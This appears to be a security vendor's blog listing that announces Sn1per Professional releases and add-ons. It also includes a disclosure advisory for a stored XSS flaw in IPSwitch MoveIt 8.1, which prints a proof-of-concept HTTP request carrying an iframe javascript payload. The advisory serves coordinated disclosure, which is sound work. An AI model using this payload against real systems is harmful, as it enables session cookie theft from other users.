Sn1per-Professional-Discover-The-Attack-Surface1

Attack Surface Management With Sn1per Professional

Continuous Attack Surface Management (ASM) and reduction has become a crucial function for every organization to gain visibility of their perimeter security. Having the right tools and processes in place is vital to detecting new vulnerabilities before attackers do. In this blog post, we will outline the basic steps for discovering the attack surface with Sn1per Professional v9.0.

(more…)

February 8, 2021 Bug Bounties, Hacking Tutorials, News No comments yet

Sn1per Professional Port Scanner Add-on Released!

Leverage the full power of NMap with the new “Port Scanner Add-on” for Sn1per Professional. Easily customize each NMap scan to meet your needs! Select from over 40+ hand picked scan profiles or select and run any NMap script from the drop-down menu easily. Select the multi-target list selection to scan all hosts in your workspace with a single click. Each scan produces a high quality HTML report for easy viewing and organization of all data. You can also update your Sn1per Professional port and NMap host data by selecting the “Update” checkbox. Getting the most out of NMap has never been easier or more powerful!

(more…)

October 22, 2020 News No comments yet

Sn1per Professional Nessus Add-on Released!

Scan for the latest vulnerabilities easily using Nessus and import vulnerability data with detailed HTML/CSV reports directly into Sn1per Professional! The Nessus Add-on is a must have for serious security professionals, bug bounty researchers and penetration testers alike!

Features

  • Initiate Nessus vulnerability scans from Sn1per
  • Import vulnerability data from Nessus into Sn1per Professional
  • Download Nessus vulnerability reports in HTML and CSV format

Screenshots

Nessus Add-on
Nessus Add-on
Nessus Add-on

Demo

Nessus Add-on Demo

Buy now!

As always, feel free to reach out to us at [email protected] with any questions!

August 12, 2020 News No comments yet
Sn1per Professional v6.0

Sn1per Professional v6.0 now available!

Sn1per Professional v6.0 is now available from the XeroSecurity website.

This is a BIG release with tons of new features and improvements, including:

  • 100% responsive web UI resizes to fit any resolution or device.
  • New scan progress bar indicates overall scan status to ensure 100% scan coverage of the entire workspace.
  • Improved scan dashboard gives high level overview of workspace, including downloadable lists to all domains, scanned targets and unscanned targets. These can be easily referenced and used to scan the entire attack surface using Sn1per.
  • New reports menu includes links to all Sn1per console reports which can be downloaded and viewed from the main report.
  • New sidebar shortcuts added to both the main Sn1per report and all detailed host reports to quickly jump to each section of the report.
  • Slideshow for all gathered screenshots
  • Improved host table allows searching for scan mode tags, IP/DNS, HTTP titles, status codes, HTTP headers, WAF detection and open ports.
  • New quick links for both the HTTP and HTTPS versions for each host in the host table.
  • New scan tags to indicate which hosts has been scanned and which mode (ie. Stealth, Web, Portscan, Bruteforce, etc.) and which are new in the host table section of the report.
  • New email security section indicates any email spoofing vulnerabilities for the workspace.
  • New takeovers security section indicates any potential domain takeovers or hijacking vulnerabilities.
  • New HTML5 notepad saves automatically to the main report elevating the need to save your work (keep in mind, it uses the local browser cache, so switching browsers or clearing your browser cache will remove your notes!).
  • New detailed host reports are now separate from the main report and include the following features:
    • 34 customized recon links.
    • 26 customized Google dork links.
    • HTTP/HTTPS quick links.
    • Reports menu to download the full HTML console reports for each host.
    • New sidebar links for each detailed host report to quickly jump to each section of the report.
    • HTTP/HTTPS screenshots
    • DNS
    • Sub-domains
    • Open ports
      • New links to full NMap HTML host reports.
    • Fingerprint info
    • HTTP headers
    • Web files
    • Web URL’s
      • New links to download all discovered URL’s for each host
    • SSL/TLS info

Documentation

For all questions regarding payment, licensing, installation or general usage, refer to our online documentation for more info or contact us at [email protected].

Documentation

Purchase Link

Sn1per Professional v6.0 (Pre-Order)

December 17, 2018 News, Uncategorized No comments yet

IPSwitch MoveIt Stored Cross Site Scripting (XSS)

Date: 1-31-2017
Software Link: https://www.ipswitch.com/moveit
Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable)
Exploit Author: [email protected]
Contact: https://twitter.com/crowdshield
Vendor Homepage: https://www.ipswitch.com
Category: Webapps
Attack Type: Remote
Impact: Data/Cookie Theft

Description

IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks.

Proof of Concept

The vulnerability lies in the Send Message -> Body Text Area input field.


POST /human.aspx?r=692492538 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://host.com/human.aspx?r=510324925
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 598

czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=<iframe/src=javascript:alert(1)>&attachment=&opt07=1&arg05_Send=Send

Solution

Update to version 9.5

Disclosure Timeline

1/30/2017 – Disclosed details of vulnerability to IPSwitch.
1/31/2017 – IPSwitch confirmed the vulnerability and verified the fix as of version 9.5 and approved public disclosure of the vulnerability.

January 15, 2018 CVE's, Exploits & PoC's, Uncategorized No comments yet
Products
Follow me on Twitter
Attack Surface Management & IT Asset Inventory with Sn1per Professional
Recent Posts
Categories
Meta